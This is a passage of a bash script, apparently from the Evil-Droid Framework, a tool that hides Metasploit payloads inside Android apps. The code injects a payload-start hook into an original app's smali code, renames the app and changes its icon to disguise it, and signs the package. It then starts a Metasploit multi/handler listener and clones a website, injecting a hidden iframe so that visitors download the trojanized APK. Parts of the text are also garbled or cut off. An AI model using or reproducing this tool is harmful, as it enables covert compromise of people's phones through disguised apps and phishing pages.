grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[*] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}
function chage name and icon
function merge_name_ico()
{
echo -e $yellow ""
echo "[] Changing name and icon payload..."
spinlong
label=' '
label1=' '
sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1
sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1
mkdir $path/payload/res/drawable
cp $iconos $path/payload/res/drawable/main_icon.png
}
#function signing apk
function sign()
{
echo -e $yellow ""
echo "[] Checking for ~/.android/debug.keystore for signing..."
spinlong
if [ ! -f
/.android/debug.keystore ]; then/.android" ]; thenecho -e $red ""
echo " [ X ] Debug key not found. Generating one now..."
spinlong
if [ ! -d "
mkdir ~/.android > /dev/null 2>&1
fi
echo -e $lightgreen ""
keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000
fi
spinlong
echo -e $yellow ""
echo "[] Attempting to sign the package with your android debug key"
spinlong
jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1
echo -e $yellow
echo "[] Verifying signed artifacts..."
spinlong
jarsigner -verify -certs evil.apk > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to verify signed artifacts"
apache_svc_stop
postgresql_stop
exit $rc
fi
echo -e $yellow
echo "[] Aligning recompiled APK..."
spinlong
zipalign 4 evil.apk $apk_name.apk 2>&1
rc=$?
echo -e $yellow
echo "[✔] Done."
spinlong
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to align recompiled APK"
apache_svc_stop
postgresql_stop
exit $rc
fi
rm evil.apk > /dev/null 2>&1
}
#function ask
function quests()
{
while true; do
echo ""
quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null)
case $quest in
APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;;
ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;;
esac
done
}
#function listeners
function listener()
{
xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'"
}
#function clone site
function clns()
{
clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null)
}
function index_name()
{
index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null)
echo -e $yellow ""
echo "[] Clone Website From URL..."
spinlong
wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1
}
function launcher()
{
echo '<iframe id="frame" src="evil.apk" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe><script type="text/javascript">setTimeout(function(){window.location.href="http://local-ip";}, 15000);</script>' | sed "s|evil.apk|$apk_name.apk|" | sed "s|local-ip|$LHOST/$index.html|" >> apk_index
com=
cat apk_index
rep=""
sed "s|$rep|$com|" $index.html > index2.html
mv index2.html /var/www/html/$index.html > /dev/null 2>&1
cp $path/evilapk/$apk_name.apk /var/www/html > /dev/null 2>&1
rm apk_index > /dev/null 2>&1
rm $index.html > /dev/null 2>&1
zenity --title "☢ SITE CLONED ☢" --info --text "http://$LHOST/$index.html" --width 400 > /dev/null 2>&1
}
#function attack verctor
function atkv()
{
while true; do
echo ""
atk_v=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose an option bellow:" --radiolist --column "Choose" --column "Option" TRUE "Multi-Handler" FALSE "Attack-Vector" FALSE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $atk_v in
Multi-Handler) listener;suite;;
Attack-Vector) clns;spinlong;index_name;launcher;listener;suite;;
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
#function suite
function suite()
{
while true; do
echo ""
suit=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Would you like to continue?" --radiolist --column "Choose" --column "Option" TRUE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $suit in
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
#function clean files
function clean()
{
rm $directory/* > /dev/null 2>&1
rm $path/.jpeg > /dev/null 2>&1
rm $path/.txt > /dev/null 2>&1
rm /var/www/html/*.apk > /dev/null 2>&1
rm /var/www/html/$index.html > /dev/null 2>&1
}
start=$(zenity --question --title="☢ Evil-Droid Framework ☢" --text "Execute framework and Services?" --width 270 2> /dev/null)
if [ "$?" -eq "0" ]; then
apache_svc_start
postgresql_start
else
clear
echo ""
echo -e $lightgreen "╔──────────────────────────────────────────────╗"
echo -e $lightgreen "| Author: Mascerano Bachir |"
echo -e $lightgreen "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $lightgreen "| Credits to : MrPedroubuntu , Kader Achraf |"
echo -e $lightgreen "| , youcef yahia |"
echo -e $lightgreen "| and Mohammed Yacine |"
echo -e $lightgreen "┖──────────────────────────────────────────────┙"
echo ""
apache_svc_stop
postgresql_stop
exit
fi
clear
#main menu
function main()
{
while :
do
}
main